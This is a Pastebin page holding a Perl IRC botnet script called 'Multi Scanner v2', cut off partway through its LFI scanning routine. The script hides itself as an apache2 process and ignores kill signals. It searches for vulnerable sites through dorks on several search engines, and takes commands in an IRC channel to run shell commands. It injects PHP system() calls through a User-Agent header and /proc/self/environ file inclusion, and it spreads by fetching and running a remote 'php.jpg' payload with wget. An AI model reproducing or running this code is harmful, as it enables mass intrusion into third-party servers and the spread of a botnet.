API tools faq
paste
Advertisement
RoryPrayana

Bot Irc Multi Scanner LFI/RFI/SQL/XML

RoryPrayana
Aug 14th, 2014
1,235
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Perl 45.91 KB | None | 0 0
raw download clone embed print report
  1. //Hacking tutorial underground, cyber,security,sql inject,basic,ethical hacking
  2. //just on http://jok3d.blogspot.com/
  3.  
  4. #!/usr/bin/perl
  5. $powered="BaMbY";
  6. $mail="admin(at)bamby.web.id";
  7.   #####################################################################################
  8.   ##                                                                                 ##
  9.   ##                                                                   28/05/2010    ##
  10.   ##  Author  : BaMbY                                                                ##
  11.   ##  Team    : Irc.Byroe.Net                                                        ##
  12.   ##  WebSite : http://www.bamby.web.id                                              ##
  13.   ##  Contact : admin(at)bamby.web.id                                                ##
  14.   ##                                                                                 ##
  15.   ##  ## IMPORTANT ##                                                                ##
  16.   ##   # ONLY FOR EDUCATIONAL PURPOSE. THE AUTHOR IS NOT RESPONSABLE OF ANY          ##
  17.   ##   # IMPROPERLY USE OF THIS TOOL. USE IT AT YOUR OWN RISK !!                     ##
  18.   ##   # THIS TOOL HAS BEEN MADE TO HELP NET ADMINISTRATORS TO MAKE THEIR            ##
  19.   ##   # SYSTEM MORE SECURE.                                                         ##
  20.   ##  ##                                                                             ##
  21.   ##                                                                                 ##
  22.   ##  Features:                                                                      ##
  23.   ##    [+]Sql Injection Scanner                                                     ##
  24.   ##    [+]XML (Extensible Markup Language) Injection Scanner                        ##
  25.   ##    [+]Remote File Inclusion Scanner                                             ##
  26.   ##    [+]Local File Inclusion Scanner                                              ##
  27.   ##    [+]Integrated Shell, so you can execute commands on the server               ##
  28.   ##    [+]Spread Mode, to activate or disable Spread Function                       ##
  29.   ##                                                                                 ##
  30.   #####################################################################################
  31. use HTTP::Request;
  32. use LWP::UserAgent;
  33. use IO::Socket;
  34. use IO::Select;
  35. use IO::Socket::INET;
  36. use Socket;
  37. use HTTP::Request::Common;
  38. use LWP::Simple;
  39. use LWP 5.64;
  40. use HTTP::Request::Common qw(POST);
  41. use Digest::MD5 qw(md5_hex);
  42. use MIME::Base64;
  43. my $fakeproc    = "/usr/sbin/apache2 -k start";
  44. $ircserver      = "irc.byroe.net";
  45. my $ircport     = "7000";
  46. my $nickname    = "nZScn";
  47. my $ident       = "BaMbY";
  48. my $channel     = "#scan";
  49. my $runner      = "BaMbY";
  50. my $fullname    = 'New Scanner ByroeNet';
  51. my $lfi         = "!lfi";
  52. my $xml         = "!xml";
  53. my $sql         = "!sql";
  54. my $rfi         = "!rfi";
  55. my $cmdlfi      = "!cmdlfi";
  56. my $cmdxml      = "!cmdxml";
  57. my $myste       = "http://www.tempat-respon-dan-spreader.com/";
  58. my $lfispread   = "cd /tmp;lwp-download ".$myste."php.jpg;perl php.jpg;rm -rf *.jpg*;wget ".$myste."php.jpg;perl php.jpg;rm -rf *.jpg*";    # Spread LFI
  59. my $xmlspread   = "cd /tmp;lwp-download ".$myste."php.jpg;perl php.jpg;rm -rf *.jpg*;wget ".$myste."php.jpg;perl php.jpg;rm -rf *.jpg*";    # Spread XML
  60. my $rspo_test   = "../../../../../../../../../../../../../../../proc/self/environ%00";
  61. my $rspo_shell  = $myste."mysh.jpg?";
  62. my $rfispread   = $myste."mysp.jpg?";
  63. my $rfiid       = $myste."myid.jpg?";
  64. $SIG{'INT'}     = 'IGNORE';
  65. $SIG{'HUP'}     = 'IGNORE';
  66. $SIG{'TERM'}    = 'IGNORE';
  67. $SIG{'CHLD'}    = 'IGNORE';
  68. $SIG{'PS'}      = 'IGNORE';
  69. chdir("/tmp");
  70. $ircserver="$ARGV[0]" if $ARGV[0];
  71. $0 = "$fakeproc"."\0"x16;;
  72. &SIGN();
  73. my $pid = fork;
  74. exit if $pid;
  75. die "\n [!] Something Wrong !!!: $!" unless defined($pid);
  76. our %irc_servers;
  77. our %DCC;
  78. my $dcc_sel = new IO::Select->new();
  79. $sel_client = IO::Select->new();
  80. sub sendraw {
  81.     if ($#_ == '1') {
  82.     my $socket = $_[0];
  83.     print $socket "$_[1]\n";
  84.     } else {
  85.         print $IRC_cur_socket "$_[0]\n";
  86.     }
  87. }
  88. sub connector {
  89.     my $mynick = $_[0];
  90.     my $ircserver_con = $_[1];
  91.     my $ircport_con = $_[2];
  92.     my $IRC_socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$ircserver_con", PeerPort=>$ircport_con) or return(1);
  93.     if (defined($IRC_socket)) {
  94.         $IRC_cur_socket = $IRC_socket;
  95.         $IRC_socket->autoflush(1);
  96.         $sel_client->add($IRC_socket);
  97.         $irc_servers{$IRC_cur_socket}{'host'} = "$ircserver_con";
  98.         $irc_servers{$IRC_cur_socket}{'port'} = "$ircport_con";
  99.         $irc_servers{$IRC_cur_socket}{'nick'} = $mynick;
  100.         $irc_servers{$IRC_cur_socket}{'myip'} = $IRC_socket->sockhost;
  101.         nick("$mynick");
  102.         sendraw("USER $ident ".$IRC_socket->sockhost." $ircserver_con :$fullname");
  103.         sleep 1;
  104.     }
  105. }
  106. sub parse {
  107.     my $servarg = shift;
  108.     if ($servarg =~ /^PING \:(.*)/) {
  109.         sendraw("PONG :$1");
  110.     } elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?) PRIVMSG (.+?) \:(.+)/) {
  111.         my $pn=$1; my $hostmask= $3; my $onde = $4; my $args = $5;
  112.         if ($args =~ /^\001VERSION\001$/) {
  113.             notice("$pn", "\001VERSION mIRC v6.17 Khaled Mardam-Bey\001");
  114.         }
  115.         if ($args =~ /^(\Q$mynick\E|\!a)\s+(.*)/ ) {
  116.             my $natrix = $1;
  117.             my $arg = $2;
  118.         }
  119.     }
  120.     elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?)\s+NICK\s+\:(\S+)/i) {
  121.         if (lc($1) eq lc($mynick)) {
  122.             $mynick=$4;
  123.             $irc_servers{$IRC_cur_socket}{'nick'} = $mynick;
  124.         }
  125.     } elsif ($servarg =~ m/^\:(.+?)\s+433/i) {
  126.         nick("$mynick|".int rand(999));
  127.     } elsif ($servarg =~ m/^\:(.+?)\s+001\s+(\S+)\s/i) {
  128.         $mynick = $2;
  129.         $irc_servers{$IRC_cur_socket}{'nick'} = $mynick;
  130.         $irc_servers{$IRC_cur_socket}{'nome'} = "$1";
  131.         sendraw("MODE $nickname +Bx");
  132.         sendraw("JOIN $channel");
  133.         sendraw("PRIVMSG $channel :Hello, I`m Ready To Scanner");
  134.         sendraw("PRIVMSG $runner :Hi $runner im here !!!");
  135.     }
  136. }
  137. my $line_temp;
  138. while( 1 ) {
  139.     while (!(keys(%irc_servers))) { connector("$nickname", "$ircserver", "$ircport"); }
  140.     delete($irc_servers{''}) if (defined($irc_servers{''}));
  141.     my @ready = $sel_client->can_read(0);
  142.     next unless(@ready);
  143.     foreach $fh (@ready) {
  144.         $IRC_cur_socket = $fh;
  145.         $mynick = $irc_servers{$IRC_cur_socket}{'nick'};
  146.         $nread = sysread($fh, $msg, 4096);
  147.         if ($nread == 0) {
  148.             $sel_client->remove($fh);
  149.             $fh->close;
  150.             delete($irc_servers{$fh});
  151.         }
  152.         @lines = split (/\n/, $msg);
  153.         $msg =~ s/\r\n$//;
  154.         if ($msg=~ /PRIVMSG $channel :!help/){
  155.             sendraw($IRC_cur_socket, "PRIVMSG $channel :15(4@3Help15) 10 ################## Vuln Scanner ###################");
  156.             sendraw($IRC_cur_socket, "PRIVMSG $channel :15(4@3Help15) 10 #    ( $rfi / $lfi / $sql / $xml ) [bug] [dork]   #");
  157.             sendraw($IRC_cur_socket, "PRIVMSG $channel :15(4@3Help15) 10 ################# Execute Command #################");
  158.             sendraw($IRC_cur_socket, "PRIVMSG $channel :15(4@3Help15) 10 #    ( $cmdlfi / $cmdxml ) [target] [ecex cmd]    #");
  159.             sendraw($IRC_cur_socket, "PRIVMSG $channel :15(4@3Help15) 10 ################### md5 Command ###################");
  160.             sendraw($IRC_cur_socket, "PRIVMSG $channel :15(4@3Help15) 10 #                   !dec / !enc                   #");
  161.             sendraw($IRC_cur_socket, "PRIVMSG $channel :15(4@3Help15) 10 #################### BOT Info #####################");
  162.             sendraw($IRC_cur_socket, "PRIVMSG $channel :15(4@3Help15) 10 #   !respon | !engine | !pid | !version | !about  #");
  163.             sendraw($IRC_cur_socket, "PRIVMSG $channel :15(4@3Help15) 10 ###################################################");
  164.         }
  165.         if ($msg=~ /PRIVMSG $channel :!version/){
  166.             sendraw($IRC_cur_socket, "PRIVMSG $channel :15(4@3Version15)10 Multi Scanner v2");
  167.         }
  168.         if ($msg=~ /PRIVMSG $channel :!engine/){
  169.             sendraw($IRC_cur_socket, "PRIVMSG $channel :15(4@3Engine15)10 Google, Bing, AllTheWeb, Altavista, ASK, UOL, Yahoo.");
  170.         }
  171.         if ($msg=~ /PRIVMSG $channel :!pid/){
  172.             sendraw($IRC_cur_socket, "PRIVMSG $channel :15(4@3PID15)10 Process/ID : 4 $fakeproc - $$");
  173.         }
  174.         if ($msg=~ /PRIVMSG $channel :!about/){
  175.             sendraw($IRC_cur_socket, "PRIVMSG $channel :15(4@3About15)3 Multi Scanner v2");
  176.             sendraw($IRC_cur_socket, "PRIVMSG $channel :15(4@3About15)3 Coded by BaMbY ");
  177.             sendraw($IRC_cur_socket, "PRIVMSG $channel :15(4@3About15)3 Copyright © 2010 ByroeNet");
  178.         }
  179.         ##################################################################### CMD IRC
  180.         if ($msg=~ /PRIVMSG $channel :!enc\s+(.*)/){
  181.             my $enc = $1;
  182.             &enc($enc);
  183.         }
  184.         if ($msg=~ /PRIVMSG $channel :!dec\s+(.*)/){
  185.             my $dec = $1;
  186.             &dec($dec);
  187.         }
  188.         if ($msg=~ /PRIVMSG $channel :!btjoin\s+(.*)/){
  189.             my $cnls = $1;
  190.             &join($cnls);
  191.         }
  192.         if ($msg=~ /PRIVMSG $channel :!btpart\s+(.*)/){
  193.             my $cnls = $1;
  194.             &part($cnls);
  195.         }
  196.         if ($msg=~ /PRIVMSG $channel :!btquit\s+(.*)/){
  197.             my $cnls = $1;
  198.             &quit($cnls);
  199.         }
  200.         if ($msg=~ /PRIVMSG $channel :!chweb\s+(.*)/){
  201.             $newmyste = $1;
  202.             $myste = $newmyste;
  203.             sendraw($IRC_cur_socket, "PRIVMSG $channel :15(4@3Info15)3 Website response changed !");
  204.         }
  205.         if ($msg=~ /PRIVMSG $channel :!respon/){
  206.             my $re = query($rfiid);
  207.             if ( $re =~ /ByroeNet/ ) {
  208.                 sendraw($IRC_cur_socket, "PRIVMSG $channel :15(4@3Info15)3 Response is working !");
  209.             }
  210.             else {
  211.                 sendraw($IRC_cur_socket, "PRIVMSG $channel :15(4@3Info15)3 Response is 4NOT3 working !");
  212.             }
  213.         }
  214.         if ($msg=~ /PRIVMSG $channel :!exec\s+(.*)/){
  215.                         my $cmd = $1;
  216.             if ($msg =~ /cd (.*)/) {
  217.                 chdir("$1") || sendraw($IRC_cur_socket, "PRIVMSG $channel :15(4@3Shell15)3 Can't change dir !");
  218.                 return;
  219.             }
  220.             my @output = `$1`;
  221.             foreach my $out(@output) {
  222.                 sendraw($IRC_cur_socket, "PRIVMSG $channel :15(4@3Shell15)3 $out ");
  223.            }
  224.            exit;
  225.         }
  226.         ##################################################################### CMD LFI
  227.         if ($msg=~ /PRIVMSG $channel :$cmdlfi\s+(.*?)\s+(.*)/){
  228.             my $url = $1."../../../../../../../../../../../../../../../proc/self/environ%00";
  229.             my $cmd = $2;
  230.             &cmdlfi($url,$cmd);
  231.         }
  232.         #####################################################################
  233.         #####################         LFI LFI LFI         ###################
  234.         ##################################################################### Google Engine
  235.         if ($msg=~ /PRIVMSG $channel :$lfi\s+(.*?)\s+(.*)/ ) {
  236.             if (my $pid = fork) {
  237.                 waitpid($pid, 0);
  238.             }
  239.             else {
  240.                 if (fork) {    exit; } else {
  241.                     my $engx = "GooGLe";
  242.                     my $bugx = $1;
  243.                     my $d0rk = $2;
  244.                     sendraw($IRC_cur_socket, "PRIVMSG $channel :15(4@3LFI15)10 Dork :4 $d0rk");
  245.                     sendraw($IRC_cur_socket, "PRIVMSG $channel :15(4@3LFI15)10 File :4 $bugx");
  246.                     sendraw($IRC_cur_socket, "PRIVMSG $channel :15(4@3LFI15)7 Search Engine Loading ...");
  247.                     &lfiscan($engx,$bugx,$d0rk);
  248.                 }
  249.                 exit;
  250.             }
  251.         }
  252.  
  253.         ##################################################################### AllTheWeb Engine
  254.         if ($msg=~ /PRIVMSG $channel :$lfi\s+(.*?)\s+(.*)/ ) {
  255.             if (my $pid = fork) {
  256.                 waitpid($pid, 0);
  257.             }
  258.             else {
  259.                 if (fork) {    exit; } else {
  260.                     my $engx = "AllTheWeb";
  261.                     my $bugx = $1;
  262.                     my $d0rk = $2;
  263.                     &lfiscan($engx,$bugx,$d0rk);
  264.                 }
  265.                 exit;
  266.             }
  267.         }
  268.  
  269.         ##################################################################### Bing Engine
  270.         if ($msg=~ /PRIVMSG $channel :$lfi\s+(.*?)\s+(.*)/ ) {
  271.             if (my $pid = fork) {
  272.                 waitpid($pid, 0);
  273.             }
  274.             else {
  275.                 if (fork) {    exit; } else {
  276.                     my $engx = "Bing";
  277.                     my $bugx = $1;
  278.                     my $d0rk = $2;
  279.                     &lfiscan($engx,$bugx,$d0rk);
  280.                 }
  281.                 exit;
  282.             }
  283.         }
  284.  
  285.         ##################################################################### Altavista Engine
  286.         if ($msg=~ /PRIVMSG $channel :$lfi\s+(.*?)\s+(.*)/ ) {
  287.             if (my $pid = fork) {
  288.                 waitpid($pid, 0);
  289.             }
  290.             else {
  291.                 if (fork) {    exit; } else {
  292.                     my $engx = "ALtaViSTa";
  293.                     my $bugx = $1;
  294.                     my $d0rk = $2;
  295.                     &lfiscan($engx,$bugx,$d0rk);
  296.                 }
  297.                 exit;
  298.             }
  299.         }
  300.  
  301.         ##################################################################### ASK Engine
  302.         if ($msg=~ /PRIVMSG $channel :$lfi\s+(.*?)\s+(.*)/ ) {
  303.             if (my $pid = fork) {
  304.                 waitpid($pid, 0);
  305.             }
  306.             else {
  307.                 if (fork) {    exit; } else {
  308.                     my $engx = "AsK";
  309.                     my $bugx = $1;
  310.                     my $d0rk = $2;
  311.                     &lfiscan($engx,$bugx,$d0rk);
  312.                 }
  313.                 exit;
  314.             }
  315.         }
  316.  
  317.         ##################################################################### UoL Engine
  318.         if ($msg=~ /PRIVMSG $channel :$lfi\s+(.*?)\s+(.*)/ ) {
  319.             if (my $pid = fork) {
  320.                 waitpid($pid, 0);
  321.             }
  322.             else {
  323.                 if (fork) {    exit; } else {
  324.                     my $engx = "UoL";
  325.                     my $bugx = $1;
  326.                     my $d0rk = $2;
  327.                     &lfiscan($engx,$bugx,$d0rk);
  328.                 }
  329.                 exit;
  330.             }
  331.         }
  332.  
  333.         ##################################################################### Yahoo Engine
  334.         if ($msg=~ /PRIVMSG $channel :$lfi\s+(.*?)\s+(.*)/ ) {
  335.             if (my $pid = fork) {
  336.                 waitpid($pid, 0);
  337.             }
  338.             else {
  339.                 if (fork) {    exit; } else {
  340.                     my $engx = "YahOo";
  341.                     my $bugx = $1;
  342.                     my $d0rk = $2;
  343.                     &lfiscan($engx,$bugx,$d0rk);
  344.                 }
  345.                 exit;
  346.             }
  347.         }
  348.         #####################################################################
  349.         #####################         XML XML XML         ###################
  350.         #####################################################################
  351.         if ($msg=~ /PRIVMSG $channel :$cmdxml\s+(.*?)\s+(.*)/){
  352.             my $url = $1;
  353.             my $cmd = $2;
  354.             &cmdxml($url,$cmd);
  355.         }
  356.         ##################################################################### GooGle Engine    
  357.         if ($msg=~ /PRIVMSG $channel :$xml\s+(.*?)\s+(.*)/ ) {
  358.             if (my $pid = fork) {
  359.                 waitpid($pid, 0);
  360.             }
  361.             else {
  362.                 if (fork) {    exit; } else {
  363.                     my $engx = "GooGLe";
  364.                     my $bugx = $1;
  365.                     my $d0rk = $2;
  366.                     sendraw($IRC_cur_socket, "PRIVMSG $channel :15(4@3XML15)10 Dork :4 $d0rk");
  367.                     sendraw($IRC_cur_socket, "PRIVMSG $channel :15(4@3XML15)10 File :4 $bugx");
  368.                     sendraw($IRC_cur_socket, "PRIVMSG $channel :15(4@3XML15)7 Search Engine Loading ...");
  369.                     &xmlscan($engx,$bugx,$d0rk);
  370.                 }
  371.                 exit;
  372.             }
  373.         }
  374.         ##################################################################### AllTheWeb Engine
  375.         if ($msg=~ /PRIVMSG $channel :$xml\s+(.*?)\s+(.*)/ ) {
  376.             if (my $pid = fork) {
  377.                 waitpid($pid, 0);
  378.             }
  379.             else {
  380.                 if (fork) {    exit; } else {
  381.                     my $engx = "AllTheWeb";
  382.                     my $bugx = $1;
  383.                     my $d0rk = $2;
  384.                     &xmlscan($engx,$bugx,$d0rk);
  385.                 }
  386.                 exit;
  387.             }
  388.         }
  389.  
  390.         ##################################################################### Bing Engine
  391.         if ($msg=~ /PRIVMSG $channel :$xml\s+(.*?)\s+(.*)/ ) {
  392.             if (my $pid = fork) {
  393.                 waitpid($pid, 0);
  394.             }
  395.             else {
  396.                 if (fork) {    exit; } else {
  397.                     my $engx = "Bing";
  398.                     my $bugx = $1;
  399.                     my $d0rk = $2;
  400.                     &xmlscan($engx,$bugx,$d0rk);
  401.                 }
  402.                 exit;
  403.             }
  404.         }
  405.  
  406.         ##################################################################### Altavista Engine
  407.         if ($msg=~ /PRIVMSG $channel :$xml\s+(.*?)\s+(.*)/ ) {
  408.             if (my $pid = fork) {
  409.                 waitpid($pid, 0);
  410.             }
  411.             else {
  412.                 if (fork) {    exit; } else {
  413.                     my $engx = "ALtaViSTa";
  414.                     my $bugx = $1;
  415.                     my $d0rk = $2;
  416.                     &xmlscan($engx,$bugx,$d0rk);
  417.                 }
  418.                 exit;
  419.             }
  420.         }
  421.  
  422.         ##################################################################### ASK Engine
  423.         if ($msg=~ /PRIVMSG $channel :$xml\s+(.*?)\s+(.*)/ ) {
  424.             if (my $pid = fork) {
  425.                 waitpid($pid, 0);
  426.             }
  427.             else {
  428.                 if (fork) {    exit; } else {
  429.                     my $engx = "AsK";
  430.                     my $bugx = $1;
  431.                     my $d0rk = $2;
  432.                     &xmlscan($engx,$bugx,$d0rk);
  433.                 }
  434.                 exit;
  435.             }
  436.         }
  437.  
  438.         ##################################################################### UoL Engine
  439.         if ($msg=~ /PRIVMSG $channel :$xml\s+(.*?)\s+(.*)/ ) {
  440.             if (my $pid = fork) {
  441.                 waitpid($pid, 0);
  442.             }
  443.             else {
  444.                 if (fork) {    exit; } else {
  445.                     my $engx = "UoL";
  446.                     my $bugx = $1;
  447.                     my $d0rk = $2;
  448.                     &xmlscan($engx,$bugx,$d0rk);
  449.                 }
  450.                 exit;
  451.             }
  452.         }
  453.  
  454.         ##################################################################### Yahoo Engine
  455.         if ($msg=~ /PRIVMSG $channel :$xml\s+(.*?)\s+(.*)/ ) {
  456.             if (my $pid = fork) {
  457.                 waitpid($pid, 0);
  458.             }
  459.             else {
  460.                 if (fork) {    exit; } else {
  461.                     my $engx = "YahOo";
  462.                     my $bugx = $1;
  463.                     my $d0rk = $2;
  464.                     &xmlscan($engx,$bugx,$d0rk);
  465.                 }
  466.                 exit;
  467.             }
  468.         }
  469.        
  470.         #####################################################################
  471.         #####################         RFI RFI RFI         ###################
  472.         ##################################################################### GooGle Engine    
  473.        
  474.         if ($msg=~ /PRIVMSG $channel :$rfi\s+(.*?)\s+(.*)/ ) {
  475.             if (my $pid = fork) {
  476.                 waitpid($pid, 0);
  477.             }
  478.             else {
  479.                 if (fork) {    exit; } else {
  480.                     my $engx = "GooGLe";
  481.                     my $bugx = $1;
  482.                     my $d0rk = $2;
  483.                     sendraw($IRC_cur_socket, "PRIVMSG $channel :15(4@3RFI15)10 Dork :4 $d0rk");
  484.                     sendraw($IRC_cur_socket, "PRIVMSG $channel :15(4@3RFI15)10 File :4 $bugx");
  485.                     sendraw($IRC_cur_socket, "PRIVMSG $channel :15(4@3RFI15)7 Search Engine Loading ...");
  486.                     &rfiscan($engx,$bugx,$d0rk);
  487.                 }
  488.                 exit;
  489.             }
  490.         }
  491.  
  492.         ##################################################################### AllTheWeb Engine
  493.         if ($msg=~ /PRIVMSG $channel :$rfi\s+(.*?)\s+(.*)/ ) {
  494.             if (my $pid = fork) {
  495.                 waitpid($pid, 0);
  496.             }
  497.             else {
  498.                 if (fork) {    exit; } else {
  499.                     my $engx = "AllTheWeb";
  500.                     my $bugx = $1;
  501.                     my $d0rk = $2;
  502.                     &rfiscan($engx,$bugx,$d0rk);
  503.                 }
  504.                 exit;
  505.             }
  506.         }
  507.  
  508.         ##################################################################### Bing Engine
  509.         if ($msg=~ /PRIVMSG $channel :$rfi\s+(.*?)\s+(.*)/ ) {
  510.             if (my $pid = fork) {
  511.                 waitpid($pid, 0);
  512.             }
  513.             else {
  514.                 if (fork) {    exit; } else {
  515.                     my $engx = "Bing";
  516.                     my $bugx = $1;
  517.                     my $d0rk = $2;
  518.                     &rfiscan($engx,$bugx,$d0rk);
  519.                 }
  520.                 exit;
  521.             }
  522.         }
  523.  
  524.         ##################################################################### Altavista Engine
  525.         if ($msg=~ /PRIVMSG $channel :$rfi\s+(.*?)\s+(.*)/ ) {
  526.             if (my $pid = fork) {
  527.                 waitpid($pid, 0);
  528.             }
  529.             else {
  530.                 if (fork) {    exit; } else {
  531.                     my $engx = "ALtaViSTa";
  532.                     my $bugx = $1;
  533.                     my $d0rk = $2;
  534.                     &rfiscan($engx,$bugx,$d0rk);
  535.                 }
  536.                 exit;
  537.             }
  538.         }
  539.  
  540.         ##################################################################### ASK Engine
  541.         if ($msg=~ /PRIVMSG $channel :$rfi\s+(.*?)\s+(.*)/ ) {
  542.             if (my $pid = fork) {
  543.                 waitpid($pid, 0);
  544.             }
  545.             else {
  546.                 if (fork) {    exit; } else {
  547.                     my $engx = "AsK";
  548.                     my $bugx = $1;
  549.                     my $d0rk = $2;
  550.                     &rfiscan($engx,$bugx,$d0rk);
  551.                 }
  552.                 exit;
  553.             }
  554.         }
  555.  
  556.         ##################################################################### UoL Engine
  557.         if ($msg=~ /PRIVMSG $channel :$rfi\s+(.*?)\s+(.*)/ ) {
  558.             if (my $pid = fork) {
  559.                 waitpid($pid, 0);
  560.             }
  561.             else {
  562.                 if (fork) {    exit; } else {
  563.                     my $engx = "UoL";
  564.                     my $bugx = $1;
  565.                     my $d0rk = $2;
  566.                     &rfiscan($engx,$bugx,$d0rk);
  567.                 }
  568.                 exit;
  569.             }
  570.         }
  571.  
  572.         ##################################################################### Yahoo Engine
  573.         if ($msg=~ /PRIVMSG $channel :$rfi\s+(.*?)\s+(.*)/ ) {
  574.             if (my $pid = fork) {
  575.                 waitpid($pid, 0);
  576.             }
  577.             else {
  578.                 if (fork) {    exit; } else {
  579.                     my $engx = "YahOo";
  580.                     my $bugx = $1;
  581.                     my $d0rk = $2;
  582.                     &rfiscan($engx,$bugx,$d0rk);
  583.                 }
  584.                 exit;
  585.             }
  586.         }
  587.         #####################################################################
  588.         #####################         SQL SQL SQL         ###################
  589.         ##################################################################### GooGle Engine    
  590.        
  591.         if ($msg=~ /PRIVMSG $channel :$sql\s+(.*?)\s+(.*)/ ) {
  592.             if (my $pid = fork) {
  593.                 waitpid($pid, 0);
  594.             }
  595.             else {
  596.                 if (fork) {    exit; } else {
  597.                     my $engx = "GooGLe";
  598.                     my $bugx = $1;
  599.                     my $d0rk = $2;
  600.                     sendraw($IRC_cur_socket, "PRIVMSG $channel :15(4@3SQL15)10 Dork :4 $d0rk");
  601.                     sendraw($IRC_cur_socket, "PRIVMSG $channel :15(4@3SQL15)10 File :4 $bugx");
  602.                     sendraw($IRC_cur_socket, "PRIVMSG $channel :15(4@3SQL15)7 Search Engine Loading ...");
  603.                     &sqlscan($engx,$bugx,$d0rk);
  604.                 }
  605.                 exit;
  606.             }
  607.         }
  608.  
  609.         ##################################################################### AllTheWeb Engine
  610.         if ($msg=~ /PRIVMSG $channel :$sql\s+(.*?)\s+(.*)/ ) {
  611.             if (my $pid = fork) {
  612.                 waitpid($pid, 0);
  613.             }
  614.             else {
  615.                 if (fork) {    exit; } else {
  616.                     my $engx = "AllTheWeb";
  617.                     my $bugx = $1;
  618.                     my $d0rk = $2;
  619.                     &sqlscan($engx,$bugx,$d0rk);
  620.                 }
  621.                 exit;
  622.             }
  623.         }
  624.  
  625.         ##################################################################### Bing Engine
  626.         if ($msg=~ /PRIVMSG $channel :$sql\s+(.*?)\s+(.*)/ ) {
  627.             if (my $pid = fork) {
  628.                 waitpid($pid, 0);
  629.             }
  630.             else {
  631.                 if (fork) {    exit; } else {
  632.                     my $engx = "Bing";
  633.                     my $bugx = $1;
  634.                     my $d0rk = $2;
  635.                     &sqlscan($engx,$bugx,$d0rk);
  636.                 }
  637.                 exit;
  638.             }
  639.         }
  640.  
  641.         ##################################################################### Altavista Engine
  642.         if ($msg=~ /PRIVMSG $channel :$sql\s+(.*?)\s+(.*)/ ) {
  643.             if (my $pid = fork) {
  644.                 waitpid($pid, 0);
  645.             }
  646.             else {
  647.                 if (fork) {    exit; } else {
  648.                     my $engx = "ALtaViSTa";
  649.                     my $bugx = $1;
  650.                     my $d0rk = $2;
  651.                     &sqlscan($engx,$bugx,$d0rk);
  652.                 }
  653.                 exit;
  654.             }
  655.         }
  656.  
  657.         ##################################################################### ASK Engine
  658.         if ($msg=~ /PRIVMSG $channel :$sql\s+(.*?)\s+(.*)/ ) {
  659.             if (my $pid = fork) {
  660.                 waitpid($pid, 0);
  661.             }
  662.             else {
  663.                 if (fork) {    exit; } else {
  664.                     my $engx = "AsK";
  665.                     my $bugx = $1;
  666.                     my $d0rk = $2;
  667.                     &sqlscan($engx,$bugx,$d0rk);
  668.                 }
  669.                 exit;
  670.             }
  671.         }
  672.  
  673.         ##################################################################### UoL Engine
  674.         if ($msg=~ /PRIVMSG $channel :$sql\s+(.*?)\s+(.*)/ ) {
  675.             if (my $pid = fork) {
  676.                 waitpid($pid, 0);
  677.             }
  678.             else {
  679.                 if (fork) {    exit; } else {
  680.                     my $engx = "UoL";
  681.                     my $bugx = $1;
  682.                     my $d0rk = $2;
  683.                     &sqlscan($engx,$bugx,$d0rk);
  684.                 }
  685.                 exit;
  686.             }
  687.         }
  688.  
  689.         ##################################################################### Yahoo Engine
  690.         if ($msg=~ /PRIVMSG $channel :$sql\s+(.*?)\s+(.*)/ ) {
  691.             if (my $pid = fork) {
  692.                 waitpid($pid, 0);
  693.             }
  694.             else {
  695.                 if (fork) {    exit; } else {
  696.                     my $engx = "YahOo";
  697.                     my $bugx = $1;
  698.                     my $d0rk = $2;
  699.                     &sqlscan($engx,$bugx,$d0rk);
  700.                 }
  701.                 exit;
  702.             }
  703.         }
  704.         for(my $c=0; $c<= $#lines; $c++) {
  705.             $line = $lines[$c];
  706.             $line=$line_temp.$line if ($line_temp);
  707.             $line_temp='';
  708.             $line =~ s/\r$//;
  709.             unless ($c == $#lines) {
  710.                 parse("$line");
  711.             } else {
  712.                 if ($#lines == 0) {
  713.                     parse("$line");
  714.                 } elsif ($lines[$c] =~ /\r$/) {
  715.                     parse("$line");
  716.                 } elsif ($line =~ /^(\S+) NOTICE AUTH :\*\*\*/) {
  717.                     parse("$line");
  718.                 } else {
  719.                     $line_temp = $line;
  720.                 }
  721.             }
  722.         }
  723.     }
  724. }
  725.  
  726. ##################################################################### Procedure
  727.  
  728. sub cmdlfi() {
  729. my $browser = LWP::UserAgent->new;
  730. my $url = $_[0];
  731. my $cmd = $_[1];
  732. my $hie = "j13mbut<?system(\"$cmd 2> /dev/stdout\"); ?>j13mbut";
  733. $browser->agent("$hie");
  734. $browser->timeout(3);
  735. $response = $browser->get( $url );
  736. if ($response->content =~ /j13mbut(.*)j13mbut/s) {
  737. print $1;
  738. sendraw($IRC_cur_socket, "PRIVMSG $channel :15(4@3LFICMD15)4 $1");
  739. }
  740. }
  741.  
  742. sub lfiscan() {
  743.     my $engz = $_[0];
  744.     my $bugz = $_[1];
  745.     my $dork = $_[2];
  746.     my $contatore = 0;    
  747.     if ($engz =~ /GooGLe/) {
  748.         my @lfigoogle=&google($dork);
  749.         push(@lfitotal, @lfigoogle);
  750.         }
  751.     if ($engz =~ /AllTheWeb/) {
  752.         my @lfialltheweb=&alltheweb($dork);
  753.         push(@lfitotal, @lfialltheweb);
  754.     }
  755.     if ($engz =~ /Bing/) {
  756.         my @lfiBing=&Bing($dork);
  757.         push(@lfitotal, @lfiBing);
  758.     }
  759.     if ($engz =~ /ALtaViSTa/) {
  760.         my @lfialtavista=&altavista($dork);
  761.         push(@lfitotal, @lfialtavista);
  762.     }
  763.     if ($engz =~ /AsK/) {
  764.         my @lfiask=&ask($dork);
  765.         push(@lfitotal, @lfiask);
  766.     }
  767.     if ($engz =~ /UoL/) {
  768.         my @lfiuol=&uol($dork);
  769.         push(@lfitotal, @lfiuol);
  770.     }
  771.     if ($engz =~ /YahOo/) {
  772.         my @lfiyahoo=&yahoo($dork);
  773.         push(@lfitotal, @lfiyahoo);
  774.     }
  775.     my @lficlean = &calculate(@lfitotal);
  776.     if (scalar(@clean) != 0) {
  777.     }
  778.     my $uni=scalar(@lficlean);
  779.     foreach my $lfitarget (@lficlean)
  780.     {
  781.         $contatore++;
  782.         if ($contatore==$uni-1){
  783.             sendraw($IRC_cur_socket, "PRIVMSG $channel :15(4@3LFI15)(4@3$engz15)10 Scan Finish for14 $dork");
  784.         }
  785.         my $lfi  = "../../../../../../../../../../../../../../..";
  786.         my $xpl  = "http://".$lfitarget.$bugz.$rspo_test;
  787.         my $vuln = "http://".$lfitarget."12".$bugz."7".$rspo_test."";
  788.         my $re   = getcontent($xpl);
